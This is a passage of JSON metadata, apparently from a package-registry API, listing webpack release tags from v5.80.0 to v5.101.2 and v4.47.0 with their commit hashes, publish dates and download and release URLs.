k/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r